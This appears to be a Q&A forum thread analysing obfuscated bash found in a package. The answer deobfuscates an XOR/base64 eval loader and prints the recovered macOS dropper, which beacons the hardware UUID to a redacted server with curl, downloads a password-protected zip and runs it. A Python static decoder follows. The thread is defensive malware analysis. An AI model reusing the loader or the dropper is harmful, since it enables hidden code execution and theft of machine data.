A suspicious piece of bash code, can anyone help me explain it?

Time: 2018-07-30 15:37:09

Tags: bash eval obfuscation

After opening a package I found this piece of code. Since I'm not good at bash I don't know what to make of it, but I suspect it is malicious code. Could someone help me explain it?

#!/bin/bash
# _l HEX1 HEX2 [VAR]: XOR two hex strings byte by byte, cycling HEX2 as the key.
# Returns the result as hex, either into VAR (via eval) or on stdout.
_l() {
    _i=0;_x=0;
    for ((_i=0; _i<${#1}; _i+=2)) do
        __return_var="$__return_var$(printf "%02x" $(( ((0x${1:$_i:2})) ^ ((0x${2:$_x:2})) )) )"
        if (( (_x+=2)>=${#2} )); then ((_x=0)); fi   # wrap around to the start of the key
    done
    if [[ "$3" ]]; then eval "$3='$__return_var'"; else echo -n "$__return_var"; fi
}

# _m PAYLOAD KEY [VAR]: base64-decode PAYLOAD into a hex string, hex-encode KEY
# with xxd, XOR the two with _l, then xxd -r -p turns the hex back into the script.
_m() {
    _v=$(base64 --decode <(printf "$1"));_k=$(xxd -pu <(printf "$2"));
    __return_var="$(xxd -r -p <(_l "$_v" "$_k"))"
    if [[ "$3" ]]; then eval "$3='$__return_var'"; else echo -n "$__return_var"; fi
}
_y="8903139122"   # the key, used as its literal ASCII bytes
_t="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"

eval "$(_m "$_t" "$_y")"   # decode the hidden script and execute it

1 answer:

Answer 0 (score: 3)

The two functions at the top, _l() and _m(), read two strings, _y and _t. _t contains the obfuscated code and _y acts somewhat like a key. That key is applied piece by piece to the obfuscated code to create a base64 string, which decodes into a bash program that the eval command can execute.

Removing the eval and echoing the result instead, something like echo "$(_m "$_t" "$_y")", spits out the code that the eval command would execute. This is perfectly safe because we are no longer actually eval-ing the deobfuscated code:

#!/bin/bash

ENC_PASS=<somepasswordhere>          # redacted by the answerer
APP_DOMAIN=<somewebsite>             # redacted by the answerer
APP_ROUTE="download/dlst"
unzip_password=<anotherpasswordhere> # redacted by the answerer

os_version="$(sw_vers -productVersion)"   # macOS version
session_guid="$(uuidgen)"
machine_id="$(echo -n "$(ioreg -rd1 -c IOPlatformExpertDevice | grep -o '"IOPlatformUUID" = "\(.*\)"' | sed -E -n 's@.*"([^"]+)"@\1@p')" | tr -dc '[[:print:]]')"   # hardware UUID

# beacon: hardware UUID, session id, OS version and the embedded password go to the server
url="http://${APP_DOMAIN}/${APP_ROUTE}?mid=${machine_id}&s=${session_guid}&o=${os_version}&p=${ENC_PASS}"
tmp_path="$(mktemp /tmp/XXXXXXXXX)"
curl -f0L "${url}" >/dev/null 2>&1 >> ${tmp_path}   # download the payload (the last redirection sends stdout to tmp_path)
app_dir="$(mktemp -d /tmp/XXXXXXXX)/"
unzip -P "${unzip_password}" "${tmp_path}" -d "${app_dir}" > /dev/null 2>&1   # password-protected zip
rm -f ${tmp_path}
file_name="$(grep -m1 -v "*.app" <(ls -1 "${app_dir}"))"
volume_name="$(echo -n "${PWD}" | sed -E -n 's@^(/Volumes/[^/]+)/.*@\1@p')"   # mounted volume the script was run from, if any
volume_name="${volume_name// /%20}"
chmod +x "${app_dir}${file_name}/Contents/MacOS"/*   # mark the bundle's binaries executable
open -a "${app_dir}${file_name}" --args "s" "${session_guid}" "${volume_name}"   # launch it

I'd recommend not running it. Edited to remove the website and passwords, just in case. This obfuscation was done by some very crafty but misguided developer and isn't actually malicious... though it is almost certainly malicious. You can run it yourself without the eval to see the redacted bits.

At a high level, this sends your machine's information to a server and downloads a zip file. It unzips that zip, sets its contents as executable and then executes them. It only works on Macs, because of the MacOS subfolder in the zip (duh), and it also uses the ioreg program to collect the data stored in machine_id, which is sent to the remote server.

The next step would be to grab that zip and see what it does. I didn't download it ;)
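The answer above recovers the payload by running the sample's own _l/_m functions with the eval stripped out. A static alternative, added here as an example and not part of the post, is to re-implement the scheme in Python so that nothing from the sample is executed at all: _m base64-decodes _t into a hex string, xxd -pu turns the key into hex, _l XORs the two byte by byte with the key cycling, and xxd -r -p converts the result back into the script. The inverse (obfuscate) is included so the round trip can be checked, and a small VAR=value extractor pulls indicators such as APP_DOMAIN out of a recovered dropper. The function names, the regex and SAMPLE_SCRIPT are my own constructions; only the key literal 8903139122 comes from the post.

```python
"""Static re-implementation of the _l/_m decoder from the post (analyst tooling,
not the sample's code). plaintext = xor(unhex(base64decode(_t)), key cycled),
where the key is the literal ASCII bytes of _y."""
import base64
import binascii
import re
from itertools import cycle


def xor_cycle(data: bytes, key: bytes) -> bytes:
    """Byte-wise XOR with a repeating key: what _l does two hex chars at a time."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def deobfuscate(t: str, y: str) -> str:
    """Mirror _m "$_t" "$_y" without executing anything from the sample.

    base64 --decode yields a hex string; xxd -pu hex-encodes the key; _l XORs
    the two; xxd -r -p turns the XORed hex back into the script text.
    Whitespace is stripped from the hex in case xxd -p line-wrapped it.
    """
    hex_cipher = "".join(base64.b64decode(t).decode("ascii").split())
    cipher = binascii.unhexlify(hex_cipher)
    return xor_cycle(cipher, y.encode("ascii")).decode("utf-8")


def obfuscate(script: str, y: str) -> str:
    """Inverse of deobfuscate(): produce a value usable as _t for key y."""
    cipher = xor_cycle(script.encode("utf-8"), y.encode("ascii"))
    return base64.b64encode(binascii.hexlify(cipher)).decode("ascii")


# Rough first pass over a recovered script: top-level NAME=value or NAME="value"
# assignments.  Values are taken literally, so "$(...)" expansions are not resolved.
ASSIGN_RE = re.compile(r'^\s*([A-Za-z_][A-Za-z0-9_]*)=(?:"([^"]*)"|(\S+))', re.M)


def extract_indicators(script: str) -> dict:
    """Return {variable: value} for assignments found in the recovered script."""
    found = {}
    for m in ASSIGN_RE.finditer(script):
        found[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return found


# Constructed, harmless stand-in for the dropper; the real payload was redacted.
SAMPLE_SCRIPT = """#!/bin/bash
APP_DOMAIN=example.invalid
APP_ROUTE="download/dlst"
url="http://${APP_DOMAIN}/${APP_ROUTE}?mid=${machine_id}"
echo "would curl ${url}"
"""
SAMPLE_KEY = "8903139122"  # key literal used by the sample in the post


if __name__ == "__main__":
    t = obfuscate(SAMPLE_SCRIPT, SAMPLE_KEY)
    recovered = deobfuscate(t, SAMPLE_KEY)
    print("_t would be:", t)
    print("recovered script:\n" + recovered)
    print("indicators:", extract_indicators(recovered))
```

Because the key is only ten bytes of printable ASCII and the scheme is plain XOR, a payload that starts with the usual "#!/bin/bash" header leaks most of the key from the first few ciphertext bytes even when _y is not in hand; the decoder above is still the quickest route when, as here, the key sits right next to the payload.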